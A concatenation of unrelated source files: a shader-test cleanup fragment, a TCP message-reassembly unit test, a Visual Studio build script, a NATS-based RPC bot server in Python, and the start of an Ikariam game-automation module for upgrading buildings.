"test/IECoreRI/shaders/sxDisplacementTest.sdl",
"test/IECoreRI/shaders/sxIlluminanceTest.sdl",
"test/IECoreRI/shaders/sxLightTest.sdl",
"test/IECoreRI/shaders/sxStTest.sdl",
"test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sdl",
"test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sdl",
"test/IECoreRI/shaders/sxGetVarTest.sdl",
"test/IECoreRI/shaders/sxGetShaderTest.sdl",
"test/IECoreRI/shaders/sxTextureTest.sdl",
"test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sdl",
"test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sdl",
]
for f in files :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
unittest.main()
|
client.test.py
|
import unittest
import asyncore
import socket
import sys
import time
from gym_donkeycar.core.sim_client import SDClient
import logging
from threading import Thread
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
root.addHandler(handler)
host='localhost'
port=10000
class EchoHandler(asyncore.dispatcher_with_send):
def handle_read(self):
data = self.recv(8192)
if data:
root.info ('Server got %s' % data)
self.send(data)
class TestServer (asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(5)
self.processing_loop=True
self.handler=None
self.th = Thread(target=self.loop, args=())
self.th.start()
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
root.info ('Incoming connection from %s' % repr(addr))
self.handler = EchoHandler(sock)
def stop(self):
root.info('Stopping Server')
self.processing_loop = False
self.th.join()
root.info('Server stopped')
def loop(self):
while (self.processing_loop):
asyncore.loop(count=1)
time.sleep(0.01)
class SUT (SDClient):
def __init__(self, address):
super().__init__(*address, poll_socket_sleep_time=0.01)
self.receivedMsg=None
self.receivedCount=0
def on_msg_recv(self, json_packet):
root.info ('Got %s' % json_packet)
self.receivedMsg = json_packet
self.receivedCount+=1
def reInit(self):
self.receivedMsg = None
self.receivedCount = 0
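# the tests below feed the client raw TCP fragments and check that SDClient
# reassembles complete JSON messages regardless of how they are split; e.g.
# (illustrative payloads) b'{"a":1}\n{"b":' followed by b'2}\n' should produce
# two on_msg_recv calls.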
class SDClientTest (unittest.TestCase):
@classmethod
def setUpClass(self):
self.server=TestServer(host, port)
time.sleep(1)
@classmethod
def tearDownClass(self):
self.server.stop()
def setUp(self):
self.SUT=SUT((host, port))
time.sleep(1)
self.SUT.reInit()
def tearDown(self):
self.SUT.stop()
def test_simpleMessage(self):
self.server.handler.send(b'{"msg_type":"test1"}\n')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==1)
def test_simpleMessageUndelimited(self):
self.server.handler.send(b'{"msg_type":"test2"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==1)
def test_SimpleConcat(self):
self.server.handler.send(b'{"msg_type":"test3"}\n{"msg_type":"test31"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==2)
def test_uncompletePayload(self):
self.server.handler.send(b'{"msg_type":"test4","tutu":')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==0)
def test_fragmentedPayload1(self):
self.server.handler.send(b'{"msg_type":"test5"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test51"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload2(self):
self.server.handler.send(b'{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test6"}\n{"msg_type":"test61"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload3(self):
self.server.handler.send(b'{"msg_type":"test7"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test71"}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test72"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,3)
def test_fragmentedPayload4(self):
self.server.handler.send(b'{"msg_type":"test8"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test81"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload5(self):
self.server.handler.send(b'{"msg_type":"test9"')
time.sleep(1)
self.server.handler.send(b'}\n{')
time.sleep(1)
self.server.handler.send(b'"msg_type":"test91"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
if __name__ == '__main__':
unittest.main()
|
build.py
|
import os, subprocess, threading;
gsWDExpressPath = r"C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\WDExpress.exe";
assert os.path.isfile(gsWDExpressPath), "Cannot find WDExpress.exe";
giErrorCount = 0;
def build(sFolderPath, sFileName, sPlatform, sConfig):
global giErrorCount;
oOutputLock.acquire();
print "Building %s (%s, %s)..." % (sFileName, sPlatform, sConfig);
oOutputLock.release();
sFilePath = os.path.join(sFolderPath, sFileName);
iTryCount = 1;
while iTryCount <= 2:
asCommandLine = [gsWDExpressPath, sFilePath, "/build"];
if sConfig:
asCommandLine.append(sPlatform and "%s|%s" % (sConfig, sPlatform) or sConfig);
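# e.g. (illustrative values) with sConfig = "Release" and sPlatform = "x64" the
# command becomes [WDExpress.exe, <solution>, "/build", "Release|x64"]; with no
# platform, only "Release" would be appended.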
oProcess = subprocess.Popen(asCommandLine, executable = gsWDExpressPath);
iReturnCode = oProcess.wait();
if iReturnCode == 1:
iTryCount += 1;
else:
break;
oOutputLock.acquire();
if iReturnCode != 0:
print "Build %s (%s, %s) failed! Error code: %d" % (sFileName, sPlatform, sConfig, iReturnCode);
giErrorCount += 1;
else:
print "Build %s (%s, %s) success!" % (sFileName, sPlatform, sConfig);
oOutputLock.release();
if __name__ == "__main__":
import sys;
oOutputLock = threading.Lock();
aoThreads = [];
sFolderPath = os.path.dirname(__file__);
for sFileName in os.listdir(sFolderPath):
if sFileName[-4:].lower() == ".sln" and os.path.isfile(os.path.join(sFolderPath, sFileName)):
for sConfig in ["Debug", "Release"]:
for sPlatform in ["Win32", "x64"]:
oThread = threading.Thread(target = build, args = (sFolderPath, sFileName, sPlatform, sConfig));
oThread.start();
aoThreads.append(oThread);
for oThread in aoThreads:
oThread.join();
if giErrorCount > 0:
raw_input("Press ENTER to exit...");
|
botserver.py
|
# coding: utf-8
from __future__ import absolute_import, with_statement, print_function, unicode_literals
__version__ = '21.021.1735' # _fg_time
#__version__ = '21.020.1950' # default _system_list_methods (.__class__.__name__[-3:] == 'Api')
#__version__ = '20.324.1230' # http post body ungzip
#__version__ = '20.310.1900' # location
#__version__ = '20.281.2058' # _http, _func
#__version__ = '20.272.2127' # gzip_decode
#__version__ = '20.260.0040' # binary
#__version__ = '20.219.1837'
#__version__ = '20.211.1402'
#__version__ = '20.196.1406'
#__version__ = '20.104.0843'
#__version__ = '20.053.0012'
#__version__ = '20.022.0414'
#__version__ = '19.347.1606'
import sys
PY2 = sys.version_info[0] < 3
PY3 = sys.version_info[0] > 2
if __name__ == '__main__':
# env PYTHONIOENCODING="UTF-8"
if PY2:
reload(sys); sys.setdefaultencoding('UTF-8')
else:
if sys.stdout.encoding != 'UTF-8':
sys.stdout = open(sys.stdout.fileno(), mode='w', buffering=1, encoding='UTF-8')
#if sys.stderr.encoding != 'UTF-8':
# sys.stderr = open(sys.stderr.fileno(), mode='w', buffering=1, encoding='UTF-8')
sys.stderr.close()
sys.stderr = sys.stdout
import socket
try:
__hostname__ = sys.__hostname__
except:
__hostname__ = socket.gethostname().lower()
sys.__hostname__ = __hostname__
if PY2:
import ConfigParser as configparser
input = raw_input
from urllib import quote_plus, unquote_plus, urlencode
from urlparse import urlparse
BrokenPipeError = socket.error
ConnectionRefusedError = socket.error
from xmlrpclib import gzip_decode, gzip_encode
else:
import configparser
raw_input = input
from urllib.parse import quote_plus, unquote_plus, urlencode, urlparse
from xmlrpc.client import gzip_decode, gzip_encode
import os, time, json #, pickle
from threading import Thread, RLock
import pydoc
import threading, types, traceback
import uuid, hashlib, base64
import random
import decimal, datetime
class ExtJSONEncoder(json.JSONEncoder):
def default(self, obj):
#if isinstance(obj, Binary):
# return {'__binary__': obj.encode()}
if isinstance(obj, decimal.Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
try:
from types import SimpleNamespace
except ImportError:
class SimpleNamespace (object):
def __init__ (self, **kwargs):
self.__dict__.update(kwargs)
def __repr__ (self):
keys = sorted(self.__dict__)
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(type(self).__name__, ", ".join(items))
def __eq__ (self, other):
return self.__dict__ == other.__dict__
if PY2:
Binary = lambda data: {'__binary__': base64.b64encode(data)}
else:
Binary = lambda data: {'__binary__': base64.b64encode(data).decode('ascii')}
Location = lambda href: {'__location__': href}
#_binary = lambda obj: SimpleNamespace(data=base64.b64decode(obj.pop('__binary__'))) if '__binary__' in obj else obj
def _binary(obj):
if '__binary__' in obj:
return SimpleNamespace(data=base64.b64decode(obj.pop('__binary__')))
elif '__location__' in obj:
return SimpleNamespace(href=obj.pop('__location__'))
else:
return obj
try:
_ns
except:
_ns = SimpleNamespace(request_number=0, request_count=0)
class BOTServer(object):
def __init__(self, name, address=None, authkey=None, max_requests=0):
self._max_requests = max_requests
self._info = {}
self._sock = None
self._w_lck = RLock()
self._fg_serve_forever = False
self._functions = {}
self._botname = name
self.bot_id = 'bot.%s' % urn5(name)
if address is None:
address = ('127.0.0.1', 4222)
self._address = address
self._authkey = authkey
self.register_function(self._system_list_methods, 'system.listMethods')
self.register_function(self._system_method_help, 'system.methodHelp')
self.register_function(self._http, '.http')
@property
def request_number(self):
return _ns.request_number
@property
def request_count(self):
return _ns.request_count
def __repr__(self):
return (
"<%s for %s %s>" % (self.__class__.__name__, self._botname, self._address)
)
__str__ = __repr__
def _system_list_methods(self, func_name=None):
#print(1111, func_name)
if func_name:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(2222, func)
if func:
_list_methods = None
if hasattr(func, '_system_list_methods'):
_list_methods = getattr(func, '_system_list_methods')
#print(3333, [k for k in dir(func) if '_' != k[:1]])
if _list_methods:
return _list_methods(self, func_name)
else:
#return list(sorted('%s.' % k if isinstance(getattr(func, k), sys.__class__) or hasattr(getattr(func, k), '_system_list_methods') or getattr(func, k).__class__.__name__[-3:] == 'Api') else k for k in dir(func) if '_' != k[:1]))
_r = []
for k in dir(func):
if '_' == k[0]:
continue
m = getattr(func, k)
k = '%s.' % k if isinstance(m, sys.__class__) or hasattr(m, '_system_list_methods') or m.__class__.__name__[-3:] == 'Api' else k
_r.append(k)
_r.sort()
return _r
else:
raise RuntimeError('%s not found' % func_name)
else:
return list(sorted('%s.' % k if isinstance(v, sys.__class__) or hasattr(v, '_system_list_methods') or (v.__class__.__name__[-3:] == 'Api') else k for k, v in self._functions.items()))
def _system_method_help(self, func_name):
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return pydoc.getdoc(func)
else:
return ''
def _http(self, head, body):
global __appname__,__profile__, __version__, __index__
status = '200 OK'
r = b''
uri, args = head[''][1]
method = uri.rsplit('/', 1)[-1]
if '/' == uri:
try:
appname = getattr(sys, '__appname__')
except AttributeError:
appname = self._botname.split('.', 1)[0]
#appname = __appname__
try:
profile = getattr(sys, '__profile__')
except AttributeError:
profile = self._botname.split('.', 1)[-1]
#profile = __profile__
try:
version = getattr(sys, '__version__')
except AttributeError:
version = __version__
try:
_index = getattr(sys, '__index__')
except AttributeError:
_index = __index__
headers = [("Content-Type", "text/plain; charset=utf-8"), ("Cache-Control", "no-cache"), ("Access-Control-Allow-Origin", "*")]
r = ('%s %s %s.%s %s %s:%s/%s' % (time.strftime(_ts), sys.__hostname__, appname,profile, version, _index,self.request_number,self.request_count)).encode('utf-8')
headers.append(('Content-Length', str(len(r))))
return status, headers, r
if uri == '/ui':
uri = 'ui/'
return '303 OK', [('Location', uri),], b''
if uri[:4] == '/ui/' and uri[:8] != '/ui/RPC2':
return '404 Not Found', [], b'404 Not Found'
headers = [('Content-Type', 'application/json; charset=utf-8'), ("Cache-Control", "no-cache"), ("Access-Control-Allow-Origin", "*")]
try:
if 'post' == head[''][0]:
if b'\x1f\x8b\x08\x00' == body[:4]:
if PY2:
body = gzip_decode(body)
else:
body = gzip_decode(body, -1)
body = json.loads(body)
method, _a, _kw = body['method'], body.get('params', []), body.get('kwargs', {})
else:
_a, _kw = [], {}
if args:
#for a in args.split('&'):
# a = a.split('=', 1)
for a in (a.split('=', 1) for arg in args.split('&') for a in arg.split(',')):
if len(a) > 1:
_kw[a[0]] = a[1]
else:
_a.append(a[0])
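# e.g. (made-up query strings) '?x=1&y=2' yields _kw == {'x': '1', 'y': '2'},
# while '?3,4' yields _a == ['3', '4']; for POST requests the params come from
# the JSON body instead.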
r = self._func(method, _a, _kw)
r = json.dumps({'result': r}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
except Exception as e:
log(None)
r = json.dumps({'error': str(e)}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#r = json.dumps({'error': traceback.format_exc()}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
finally:
if len(r) > 1400:
r = gzip_encode(r)
headers.append(('Content-Encoding', 'gzip'))
headers.append(('Content-Length', str(len(r))))
return status, headers, r
def _func(self, func_name, args, kwargs):
_func_name = func_name
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
try:
func = getattr(func, fn) if func else self._functions[fn]
except:
func = None
break
if func:
if callable(func):
r = func(*args, **kwargs)
else:
r = func
return r
raise RuntimeError('%s not found' % _func_name)
def register_function(self, func, name=None):
if name:
self._functions[name] = func
else:
self._functions[func.__name__] = func
def register_instance(self, instance, allow_dotted_names=False):
for name in dir(instance):
if '_' == name[:1]:
continue
func = getattr(instance, name)
if allow_dotted_names:
self._functions[name] = func
else:
if callable(func):
self._functions[name] = func
def close(self):
self._fg_serve_forever = False
self._unsub()
self._close()
def _close(self):
try:
if self._sock:
with self._w_lck:
self._sock.close()
except:
#log(None)
pass
def _unsub(self):
try:
if self._sock:
with self._w_lck:
self._sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n')
except:
#log(None)
pass
def serve_forever(self):
self.close()
#try:
# self._serve_forever()
#finally:
# self.close()
_defer = []
defer = _defer.append
_err_old = ''
_fg_loop = True
while _fg_loop:
_fg_loop = False
_fg_time = False
try:
self._serve_forever(defer)
except (ConnectionRefusedError, RuntimeError) as e:
#traceback.print_exc()
_fg_loop = True # self._fg_serve_forever
_fg_time = True
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error1')
except Exception as e:
_fg_loop = self._fg_serve_forever
#traceback.print_exc()
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error2')
#log(None)
finally:
while _defer:
func = _defer.pop(-1)
try:
func()
except:
#log(None)
pass
#print(2222)
if _fg_loop and _fg_time:
try:
time.sleep(1 + random.random())
except:
_fg_loop = False
pass
#log('stop', begin='\r')
def notify(self, subject, data=None):
if not self._fg_serve_forever:
return
if data is None:
data = ('PUB %s 0\r\n\r\n' % subject).encode('utf8')
else:
data = json.dumps(data, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#data = pickle.dumps(data, protocol=2)
if len(data) > 1400:
data = gzip_encode(data)
data = ('PUB %s %s\r\n' % (subject, len(data))).encode('utf8') + data + b'\r\n'
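# e.g. (hypothetical call) notify('bot.status', {'ok': True}) frames
# b'PUB bot.status 12\r\n{"ok": true}\r\n'; payloads over 1400 bytes are
# gzip-compressed first, as above.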
#print('data:', data)
with self._w_lck:
try:
self._sock.sendall(data)
return True
except:
traceback.print_exc()
def _send(self, inbox_id, obj, fg_http=False):
if fg_http:
data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', obj[2]])
else:
data = json.dumps(obj, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
if len(data) > 1400:
data = gzip_encode(data)
data = b'PUB %s %s\r\n%s\r\n' % (inbox_id.encode(), ('%s' % len(data)).encode(), data)
with self._w_lck:
#log(repr(data), 'send2')
self._sock.sendall(data)
return len(data)
def _serve_forever(self, defer):
#while True:
# client_c = self.accept()
# t = Thread(target=self.handle_client, args=(client_c,))
# t.daemon = True
# t.start()
#print('00000', self._sock)
sock = socket.create_connection(self._address, 2)
self._sock = sock
defer(sock.close)
defer(lambda: sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n'))
def w(data):
with self._w_lck:
#log(repr(data), 'send1')
sock.sendall(data)
bot_name = self._botname
bot_id = self.bot_id # 'bot.%s' % urn5(bot_name)
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8'))
data = 'SUB bot.info 2\r\n'
#log(data, 'NATS')
w(data.encode('utf8'))
#data = 'SUB %s 3\r\n' % (bot_id,)
data = 'SUB %s %s 3\r\n' % (bot_id, bot_id)
#log(data, 'NATS')
w(data.encode('utf8'))
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8') + ('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
self._fg_serve_forever = True
c = 0
while self._fg_serve_forever:
cmd = ''
data = ''
try:
data = recvline(sock)
cmd, data = data[:3], data[3:]
except socket.timeout:
c += 1
#log('%s) timeout' % c, 'socket0')
if c > 3:
c = 0
#log('pong) timeout', 'socket0')
w(b'PONG\r\n')
continue
finally:
if self._max_requests < 0 and _ns.request_count < 1:
self.close()
raise ValueError('MAX REQUESTS %s' % _ns.request_number) # KeyboardInterrupt
#os._exit(0)
if not cmd:
raise RuntimeError('[ Socket ] cmd is empty')
if not data:
raise RuntimeError('[ Socket ] data is empty')
#log('>%s<' % data, '<%s>' % cmd)
if 'MSG' == cmd:
#MSG <subject> <sid> [reply-to] <#bytes>\r\n[payload]\r\n
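# e.g. (made-up frame) 'MSG bot.abc123 3 _INBOX.xyz 11' splits into
# subj='bot.abc123', sid='3', reply_id='_INBOX.xyz', size=11, and the
# 11-byte payload plus its trailing CRLF is consumed below.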
data = data.split()
#print('data:', data)
if 3 == len(data):
subj, sid, reply_id, size = data[0], data[1], '', int(data[2])
else:
subj, sid, reply_id, size = data[0], data[1], data[2], int(data[3])
payload = recvall(sock, size) if size > 0 else b''
sock.recv(1)
sock.recv(1)
#log(cmd, 'nats')
#print(cmd, subj, sid, reply_id, repr(payload)[:32], '...', len(payload), size)
if sid == '2' and reply_id and not payload:
log(subj, 'sid 2 subj:')
#sys.stdout.flush()
#MSG bot.info 2 cli.a1f9d72027a9455496efc3947fc4ea8c b''
#w(('PUB %s %s %s\r\n%s\r\n' % (reply_id, bot_id, len(bot_name), bot_name)).encode('utf8'))
elif sid == '3' and reply_id:
data = ('PUB %s 0\r\n\r\n' % reply_id).encode('utf8') # ask
#print('data:', data)
w(data)
"""
with self._w_lck:
try:
self._sock.sendall(data)
except:
traceback.print_exc()
"""
_ns.request_number += 1
_t = Thread(target=self.handle_client, args=(reply_id, payload))
_t.daemon = True
_t.name += '-msg'
_t.start()
#sys.stdout.flush()
elif 'PIN' == cmd:
w(b'PONG\r\n')
elif 'PON' == cmd:
pass
elif 'INF' == cmd:
self._info = json.loads(data[2:])
#self._info = json.loads(data[5:])
#cid = self._info['client_id']
#w(('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
elif cmd in ('+OK', '-ER'):
pass
def handle_client(self, reply_id, payload):
try:
_ns.request_count += 1
return self._handle_client(reply_id, payload)
finally:
_ns.request_count -= 1
if self._max_requests > 0:
with self._w_lck:
if self._max_requests > 0 and _ns.request_number >= self._max_requests:
self._unsub()
self._max_requests = -1
def _handle_client(self, reply_id, payload):
#threading.current_thread().conn = client_c
_fg = True
while _fg:
fg_http = False
_fg = False
try:
if b'HTTP' == payload[:4]:
head, payload = payload.split(b'\r\n', 1)
head = json.loads(head[4:])
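# the 4-byte 'HTTP' marker is followed by a JSON header, a CRLF, then the raw
# body; _http() reads head[''] as [http_method, [uri, query_string]], e.g.
# (illustrative) {"": ["get", ["/", ""]]} for a plain status request.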
#if b'\x1f\x8b\x08\x00' == payload[:4]:
# payload = gzip_decode(payload, -1)
#print(head)
#print(payload)
func_name = '.http'
args = (head, payload)
kwargs = {}
fg_http = True
else:
if b'\x1f\x8b\x08\x00' == payload[:4]:
if PY2:
payload = gzip_decode(payload)
else:
payload = gzip_decode(payload, -1)
payload = json.loads(payload, object_hook=_binary)
func_name = payload.get('method', '')
args = payload.pop('args', [])
kwargs = payload.pop('kwargs', {})
#except EOFError:
# #print('close:', client_c)
# #sys.stdout.flush()
# break
except Exception as e:
print('recv:', type(e), str(e))
traceback.print_exc()
sys.stdout.flush()
break
#print(111)
try:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(222, func)
if func:
if callable(func):
r = func(*args, **kwargs)
"""
if isinstance(r, types.GeneratorType):
self._send(reply_id, {'result': list}) # types.ListType)
#client_c.send('types.GeneratorType')
for v in r:
self._send(reply_id, {'result': v})
self._send(reply_id, {'result': StopIteration})
continue
"""
else:
r = func
if fg_http:
_len = self._send(reply_id, r, fg_http=True)
else:
_len = self._send(reply_id, {'result': r})
else:
r = RuntimeError('%s not found' % func_name)
_len = self._send(reply_id, {'error': str(r)})
#print('send >>', _len)
except Exception as e:
try:
self._send(reply_id, {'error': str(e)})
except IOError:
break
except Exception as e:
print('send:', type(e), str(e))
sys.stdout.flush()
break
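# recvline reads the socket two bytes at a time and stops at a line ending:
# when the second byte of a pair is '\r' it consumes one more byte (the '\n');
# the returned string keeps the trailing CR/LF, which callers tolerate via
# split(), slicing, or json.loads().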
def recvline(s):
data = []
while True:
ch2 = s.recv(2)
if ch2:
data.append(ch2)
if ch2[-1:] == b'\r':
data.append(s.recv(1))
break
elif ch2[-1:] == b'\n':
break
else:
break
return b''.join(data).decode()
def recvall(r, n):
data = []
c = 0
while c < n:
packet = r.recv(n - c)
if not packet:
break
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def readall(r, n):
data = []
c = 0
while c < n:
#log(c, n)
packet = r.read(n - c)
if not packet:
return b''
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def urn1(name):
h1 = hashlib.sha1(uuid.NAMESPACE_DNS.bytes)
h1.update(name.encode())
return base64.b32encode(h1.digest()).decode('utf8')
#return 'urn:sha1:%s' % base64.b32encode(h1.digest()).decode('utf8')
def urn5(name):
h5 = hashlib.md5(uuid.NAMESPACE_DNS.bytes)
h5.update(name.encode())
return base64.b16encode(h5.digest()).decode('utf8').lower()
#return 'urn:md5:%s' % base64.b16encode(h5.digest()).decode('utf8').lower()
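# e.g. urn5('mybot.conf') yields a 32-character lowercase hex digest, so the
# resulting bot_id has the form 'bot.<32 hex chars>' (the value depends on the name).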
class BOTApi(object):
def _system_list_methods(self, func_name=None):
return list(sorted(k for k in dir(self) if '_' != k[:1]))
def add2(self, x, y):
""" help add2 """
return x + y
def sub2(self, x, y):
return x - y
#def ping(self, name, port):
# client_c = threading.current_thread().conn
# s = socket.fromfd(client_c.fileno(), socket.AF_INET, socket.SOCK_STREAM)
# #print(s, dir(s), s.getpeername()[0], s.getsockname(), s.gettimeout())
# client_ip = s.getpeername()[0]
# s.close()
# return client_ip, port
_ts = "%Y-%m-%d %H:%M:%S"
__appname__ = 'botserver'
__profile__ = 'test'
__index__ = os.getpid()
def log(msg, kind='info', begin='', end='\n'):
global _ts, __hostname__, __appname__, __profile__, __version__, __index__
try:
try: ts = time.strftime(_ts)
except: ts = time.strftime(_ts)
if msg is None:
data = ''.join(
('%s %s %s.%s %s %s:%s %s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,'traceback', msg)
if i else '%s %s %s.%s %s %s:%s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,msg)
) for i, msg in enumerate(traceback.format_exc().splitlines())
)
else:
data = '%s%s %s %s.%s %s %s:%s %s%s' % (begin,ts, __hostname__, __appname__,__profile__,__version__,__index__,kind, msg,end)
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
#traceback.print_exc()
try:
if sys.log:
log = sys.log
except:
pass
################################
def run_api(name, object_function=None, func_name=None):
# Create and run the server
#serv = BOTServer(name)
#serv = BOTServer(name, ('nats0.tgbot.ms', 4222))
serv = BOTServer(name, ('127.0.0.1', 4222))
#serv = BOTServer(name, ('nats1.tgbot.ms', 4222))
# api = BOTApi()
# serv.register_function(api, 'api')
print(serv)
if object_function:
serv.register_function(object_function, func_name)
#o = dict(k1='v1', k2='v2', k3='v3')
#serv.register_instance(o)
#from pprint import pprint
#pprint(serv._functions)
serv.register_function(sys)
serv.register_function(time)
serv.register_function(time.sleep)
_th = Thread(target=serv.serve_forever)
_th.daemon = True
_th.start()
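# minimal console loop: an empty line publishes a test notification on
# 'SUBJ.<bot_id>'; any other input (or Ctrl-C) stops the server.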
try:
#serv.serve_forever()
while True:
s = input('>> ').strip()
if not s:
print(serv.notify('SUBJ.' + serv.bot_id, {1:2, 'k2': 'v4'}))
else:
raise KeyboardInterrupt
except (KeyboardInterrupt, SystemExit) as e:
print('stopped server')
sys.stdout.flush()
if __name__ == '__main__':
try:
s = sys.argv[1]
except:
s = ''
run_api('mybot.conf')
#run_api('price-bot.test' + s)
|
constructionList.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import time
import json
import math
import random
import gettext
import traceback
import threading
from decimal import *
from ikabot.config import *
from ikabot.helpers.gui import *
from ikabot.helpers.varios import *
from ikabot.helpers.botComm import *
from ikabot.helpers.pedirInfo import *
from ikabot.web.session import normal_get
from ikabot.helpers.planRoutes import *
from ikabot.helpers.getJson import getCity
from ikabot.helpers.signals import setInfoSignal
from ikabot.helpers.process import set_child_mode
from ikabot.helpers.resources import getAvailableResources
t = gettext.translation('constructionList', localedir, languages=languages, fallback=True)
_ = t.gettext
sendResources = True
expand = True
thread = None
def waitForConstruction(session, city_id):
"""
Parameters
----------
session : ikabot.web.session.Session
city_id : int
Returns
-------
city : dict
"""
while True:
html = session.get(city_url + city_id)
city = getCity(html)
construction_buildings = [building for building in city['position'] if 'completed' in building]
if len(construction_buildings) == 0:
break
construction_building = construction_buildings[0]
construction_time = construction_building['completed']
current_time = int(time.time())
final_time = int(construction_time)
seconds_to_wait = final_time - current_time
msg = _('{}: I wait {:d} seconds so that {} gets to the level {:d}').format(city['cityName'], seconds_to_wait, construction_building['name'], construction_building['level'] + 1)
sendToBotDebug(session, msg, debugON_constructionList)
wait(seconds_to_wait + 10)
html = session.get(city_url + city_id)
city = getCity(html)
return city
def expandBuilding(session, cityId, building, waitForResources):
"""
Parameters
----------
session : ikabot.web.session.Session
cityId : int
building : dict
waitForResources : bool
"""
current_level = building['level']
if building['isBusy']:
current_level += 1
levels_to_upgrade = building['upgradeTo'] - current_level
position = building['position']
time.sleep(random.randint(5, 15)) # to avoid race conditions with sendResourcesNeeded
for lv in range(levels_to_upgrade):
city = waitForConstruction(session, cityId)
building = city['position'][position]
if building['canUpgrade'] is False and waitForResources is True:
while building['canUpgrade'] is False:
time.sleep(60)
seconds = getMinimumWaitingTime(session)
html = session.get(city_url + cityId)
city = getCity(html)
building = city['position'][position]
# if no ships are coming, exit regardless of whether the building can be upgraded
if seconds == 0:
break
wait(seconds + 5)
if building['canUpgrade'] is False:
msg = _('City:{}\n').format(city['cityName'])
msg += _('Building:{}\n').format(building['name'])
msg += _('The building could not be completed due to lack of resources.\n')
msg += _('Missed {:d} levels').format(levels_to_upgrade - lv)
sendToBot(session, msg)
return
url = 'action=CityScreen&function=upgradeBuilding&actionRequest={}&cityId={}&position={:d}&level={}&activeTab=tabSendTransporter&backgroundView=city&currentCityId={}&templateView={}&ajax=1'.format(actionRequest, cityId, position, building['level'], cityId, building['building'])
resp = session.post(url)
html = session.get(city_url + cityId)
city = getCity(html)
building = city['position'][position]
if building['isBusy'] is False:
msg = _('{}: The building {} was not extended').format(city['cityName'], building['name'])
sendToBot(session, msg)
sendToBot(session, resp)
return
msg = _('{}: The building {} is being extended to level {:d}.').format(city['cityName'], building['name'], building['level']+1)
sendToBotDebug(session, msg, debugON_constructionList)
msg = _('{}: The building {} finished extending to level: {:d}.').format(city['cityName'], building['name'], building['level']+1)
sendToBotDebug(session, msg, debugON_constructionList)
def getCostsReducers(city):
"""
Parameters
----------
city : dict
Returns
-------
reducers_per_material : list[int]
"""
reducers_per_material = [0] * len(materials_names)
assert len(reducers_per_material) == 5
for building in city['position']:
if building['name'] == 'empty':
continue
lv = building['level']
if building['building'] == 'carpentering':
reducers_per_material[0] = lv
elif building['building'] == 'vineyard':
reducers_per_material[1] = lv
elif building['building'] == 'architect':
reducers_per_material[2] = lv
elif building['building'] == 'optician':
reducers_per_material[3] = lv
elif building['building'] == 'fireworker':
reducers_per_material[4] = lv
return reducers_per_material
def getResourcesNeeded(session, city, building, current_level, final_level):
"""
Parameters
----------
session : ikabot.web.session.Session
city : dict
building : dict
current_level : int
final_level : int
Returns
-------
final_costs : list[int]
"""
# get html with information about buildings
